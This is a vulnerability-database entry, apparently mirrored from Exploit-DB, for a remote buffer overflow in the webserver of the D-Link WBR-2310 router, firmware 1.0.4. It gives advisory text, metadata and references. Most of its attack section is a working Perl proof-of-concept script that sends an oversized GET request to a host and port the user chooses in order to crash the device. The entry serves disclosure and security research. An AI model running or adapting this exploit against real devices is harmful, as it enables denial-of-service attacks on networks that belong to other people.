ID

VAR-E-201008-1174


EDB ID

34394


TITLE

D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 34394

DESCRIPTION

D-Link WBR-2310 1.0.4 - 'GET' Remote Buffer Overflow (PoC).. dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 34394

AFFECTED PRODUCTS

vendor:d linkmodel:wbr-2310scope:eqversion:1.0.4

Trust: 1.3

sources: BID: 42153 // EXPLOIT-DB: 34394

EXPLOIT

source: https://www.securityfocus.com/bid/42153/info

D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver.

Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected devices webserver.

D-Link WBR-2310 firmware version 1.04 is vulnerable; other versions may also be affected.

#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1) {
usage();
}

$ip = $ARGV[0];
$port = $ARGV[1];

print "[+] Sending request...\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

sleep(3);
close($socket);

print "[+] Done!\n";

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 192.168.0.1 80\n";
exit;
}

Trust: 1.0

sources: EXPLOIT-DB: 34394

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 34394

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 34394

TYPE

'GET' Remote Buffer Overflow (PoC)

Trust: 1.0

sources: EXPLOIT-DB: 34394

CREDITS

Rodrigo Escobar

Trust: 0.6

sources: EXPLOIT-DB: 34394

EXTERNAL IDS

db:EXPLOIT-DBid:34394

Trust: 1.9

db:BIDid:42153

Trust: 1.9

db:EDBNETid:55736

Trust: 0.6

sources: BID: 42153 // EXPLOIT-DB: 34394 // EDBNET: 55736

REFERENCES

url:https://www.securityfocus.com/bid/42153/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/34394/

Trust: 0.6

url:http://www.dlink.com/

Trust: 0.3

url:https://www.exploit-db.com/exploits/34394

Trust: 0.3

sources: BID: 42153 // EXPLOIT-DB: 34394 // EDBNET: 55736

SOURCES

db:BIDid:42153
db:EXPLOIT-DBid:34394
db:EDBNETid:55736

LAST UPDATE DATE

2022-07-27T09:40:54.534000+00:00


SOURCES UPDATE DATE

db:BIDid:42153date:2010-08-03T00:00:00

SOURCES RELEASE DATE

db:BIDid:42153date:2010-08-03T00:00:00
db:EXPLOIT-DBid:34394date:2010-08-03T00:00:00
db:EDBNETid:55736date:2010-08-03T00:00:00